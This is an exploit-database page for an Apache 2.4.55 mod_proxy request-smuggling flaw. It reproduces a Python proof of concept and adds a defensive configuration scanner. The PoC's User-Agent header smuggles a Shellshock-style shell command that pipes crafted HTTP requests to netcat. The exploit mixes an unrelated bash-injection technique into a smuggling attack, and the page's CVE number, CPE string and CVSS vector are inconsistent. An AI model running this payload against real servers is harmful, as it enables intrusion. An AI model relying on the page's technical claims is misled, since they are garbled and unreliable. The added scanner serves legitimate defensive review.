Apache 2.4.55 mod_proxy HTTP Request Smuggling

CVE: CVE-2021-35028
Category: CWE-93
Price: Not specified
Severity: High
Author: Not specified
Risk: High
Exploitation Type: Remote
Date: 2024-01-02
CPE: cpe:cpe:/a:apache:http_server:2.4.55
CVSS: CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
EPSS: 0.02192
EPSSP: 0.50148

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024010008

Below is a copy:

Apache 2.4.55 mod_proxy HTTP Request Smuggling
# Some mod_proxy configurations on Apache HTTP Server versions 2.4.0 through
# 2.4.55 allow a HTTP Request Smuggling attack. Configurations are affected
# when mod_proxy is enabled along with some form of RewriteRule or
# ProxyPassMatch in which a non-specific pattern matches some portion of the
# user-supplied request-target (URL) data and is then re-inserted into the
# proxied request-target using variable substitution. For example, something
# like:
#
#     RewriteEngine on
#     RewriteRule "^/here/(.*)" "http://example.com:8080/elsewhere?$1"; [P]
#     ProxyPassReverse /here/ http://example.com:8080/
#
# Request splitting/smuggling could result in bypass of access controls in the
# proxy server, proxying unintended URLs to existing origin servers, and cache
# poisoning. Users are recommended to update to at least version 2.4.56 of
# Apache HTTP Server.

import requests


def send_exploit(proxy_url):
    # Headers attached to the probe request. The User-Agent value is the
    # original PoC's payload string and is forwarded to the proxy verbatim.
    exploit_headers = {
        'User-Agent': '() { :; }; /bin/echo -e "GET /here/../here HTTP/1.1\r\nHost: www.example.com\r\n\r\nGET /nonexistent HTTP/1.1\r\nHost: www.example.com\r\n\r\n" | nc example.com 80',
        'Connection': 'close'
    }

    # Request-target containing a dot-segment under the /here/ prefix that the
    # advisory's RewriteRule would capture and re-insert into the proxied URL.
    exploit_url = 'http://example.com/here/../here'

    # Send the request through the proxy under test for both schemes.
    response = requests.get(exploit_url, headers=exploit_headers, proxies={'http': proxy_url, 'https': proxy_url})

    print(response.text)


# Usage
if __name__ == '__main__':
    send_exploit('http://localhost:8080')
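As an added, defender-side example that is not part of the original advisory or the PoC above, the following Python script scans httpd configuration text for the shape the advisory describes: a RewriteRule with the [P] flag, or a ProxyPassMatch, whose pattern captures an arbitrary portion of the request-target and re-inserts it into the proxied URL via a back-reference. The sample configuration is constructed here; the first flagged rule mirrors the advisory's example.

```python
import re

# Constructed sample httpd configuration (not from the original page): two rules
# with the advisory's risky shape, one tightly scoped RewriteRule, one ProxyPass.
SAMPLE_CONFIG = r"""
RewriteEngine on
RewriteRule "^/here/(.*)" "http://example.com:8080/elsewhere?$1" [P]
ProxyPassReverse /here/ http://example.com:8080/
ProxyPassMatch "^/api/(.*)$" "http://backend.internal:9000/v1/$1"
RewriteRule "^/static/([A-Za-z0-9_-]+)\.css$" "http://cdn.internal/$1.css" [P]
ProxyPass /fixed/ http://backend.internal/fixed/
"""

# Capture groups that accept any request-target bytes: (.*), (.+), (.*?), (.+?)
BROAD_GROUP = re.compile(r"\(\.[*+]\??\)")
# Back-references ($1 ... $9) that re-insert a capture into the proxied URL.
BACKREF = re.compile(r"\$\d")
# RewriteRule <pattern> <substitution> [flags]  /  ProxyPassMatch <regex> <url>
DIRECTIVE = re.compile(
    r'^\s*(RewriteRule|ProxyPassMatch)\s+"?([^"\s]+)"?\s+"?([^"\s]+)"?\s*(\[[^\]]*\])?',
    re.IGNORECASE,
)


def forwards_to_proxy(directive, flags):
    """ProxyPassMatch always hands the request to mod_proxy; a RewriteRule
    does so only when its flag list contains P (or its long form, proxy)."""
    if directive.lower() == "proxypassmatch":
        return True
    if not flags:
        return False
    names = [f.strip().lower() for f in flags.strip("[]").split(",")]
    return any(n in ("p", "proxy") for n in names)


def find_risky_rules(config_text):
    """Return (line_no, directive, pattern, target) for every proxying rule
    whose pattern has a broad capture group that the target re-inserts."""
    findings = []
    for line_no, line in enumerate(config_text.splitlines(), 1):
        m = DIRECTIVE.match(line)
        if not m:
            continue
        directive, pattern, target, flags = m.groups()
        if not forwards_to_proxy(directive, flags):
            continue
        if BROAD_GROUP.search(pattern) and BACKREF.search(target):
            findings.append((line_no, directive, pattern, target))
    return findings


if __name__ == "__main__":
    for line_no, directive, pattern, target in find_risky_rules(SAMPLE_CONFIG):
        print(f"line {line_no}: {directive} {pattern} -> {target}")
```

A hit means the rule should be reviewed against the advisory: tighten the capture group to the characters the backend actually expects, or upgrade to 2.4.56 or later as the advisory recommends.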

Copyright ©2024 Exploitalert.
